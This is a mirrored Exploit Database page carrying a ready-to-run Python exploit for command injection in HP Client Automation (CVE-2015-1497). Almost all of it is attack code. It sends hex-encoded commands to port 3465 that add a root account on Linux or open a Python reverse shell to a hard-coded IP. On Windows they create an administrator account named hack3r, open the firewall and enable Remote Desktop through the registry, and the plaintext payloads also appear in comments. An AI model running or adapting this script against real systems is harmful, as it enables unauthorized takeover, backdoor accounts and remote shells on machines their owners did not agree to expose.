HP Client 9.1/9.0/8.1/7.9 – Command Injection

• Exploit Database
• 102 阅读

• 作者： SlidingWindow
  日期： 2016-10-10
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/40491/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213

  # Exploit Title: [HP Client - Automation Command Injection] # Date: [10/10/2016] # Exploit Author: [SlidingWindow] , Twitter: @kapil_khot # Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/] # Version: [Tested on version 7.9 but should work on8.1, 9.0, 9.1 too] # Tested on: [Windows 7 and CentOS release 6.7 (Final)] # CVE : [CVE-2015-1497]   #Can run following commands on linux target #Useradd Payload: hide hide sh -c &apos; useradd amiroot -p ID/JlXFIWowsE-g root&apos; #Reverse Shell Payload: hide hide sh -c "python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);&apos;"     #Runs following commands on Windows target #hide hide cmd.exe /c net user hack3r "hack3r" /add #hide hide cmd.exe /c net localgroup administrators hack3r /add #hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add #hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable #hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL #hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f     import sys,socket   print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")   def exploit_Linux(target_IP,exploit_param): if exploit_param == "1": print("\n[+]Adding privileged user amiroot/nopass") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request)   response = s.recv(1024)   if response == "\x00": print("[+]Successfully added user amiroot/nopass") else: print("[-]Failed to add user amiroot/nopass") s.close()   elif exploit_param == "2": print("\n[+]Trying to get a reverse shell") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00"   #Change this #Reverse Shell Payload: hide hide sh -c "python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);&apos;" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request)   response = s.recv(1024)   if response == "\x00": print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass") else: print("[-]Failed to get reverse shell") s.close()   else: print("\n[-]Invalid exploit parameter provided for Linux target") sys.exit()     def exploit_Windows(target_IP): counter = 0 print("[+]Adding a local user hack3r/hack3r")   request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request)   response = s.recv(1024)   if response == "\x00": print("[+]Successfully added user hack3r/hack3r") counter+= 1 else: print("[-]Failed to add user hack3r/hack3r") s.close()     print("[+]Adding user &apos;hack3r&apos; to Local Administrator&apos;s group") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024)   if response == "\x00": print("[+]Successfully added user &apos;hack3r&apos; to Local Administrators group") counter+= 1 else: print("[-]Failed to add user to &apos;hack3r&apos; Local Administrators group") s.close()   #Add user Hack3r to "Remote Desktop Users" Group print("[+]Adding user &apos;hack3r&apos; to &apos;Remote Desktop Users&apos; group") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "\x00": print("[+]Successfully added user &apos;hack3r&apos; to &apos;Remote Desktop Users&apos; group") counter+= 1 else: print("[-]Failed to add user &apos;hack3r&apos; to &apos;Remote Desktop Users&apos; group") s.close()   #Enable RDP print("[+]Trying to enable Remote Desktop Service") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "\x00": print("[+]Successfully enabled Remote Desktop Service") counter+= 1 else: print("[-]Failed to enable Remote Desktop Service") s.close()     #Enable RDP for all profiles print("[+]Trying to enable Remote Desktop Service for all firewall profiles") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "\x00": print("[+]Successfully enabled Remote Desktop Service for all firewall profiles") counter+= 1 else: print("[-]Failed to enable Remote Desktop Service for all firewallprofiles") s.close()   #Setup target to listen for RDP connections print("[+]Setting up the target server to listen to RDP connections") request = "\x00" request+= "\x31\x32\x33\x31\x32\x33\x00" request+= "\x41\x42\x43\x00" request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "\x00": print("[+]Successfully setup the target server to listen to RDP connections") counter+= 1 else: print("[-]Failed to setup the target server to listen to RDP connections") s.close()   if counter == 6: print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r") else: print("\n[-]Exploit Failed..")   #main() function here def main(): if len(sys.argv) < 2: print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell" sys.exit()   target_IP = sys.argv[1] target_OS = sys.argv[2].lower() if target_OS == "windows": exploit_Windows(target_IP) elif target_OS == "linux": exploit_param = sys.argv[3] exploit_Linux(target_IP,exploit_param) else: print("\n[-]Invalid taret Operating System selected.") sys.exit() if __name__ == &apos;__main__&apos;: main()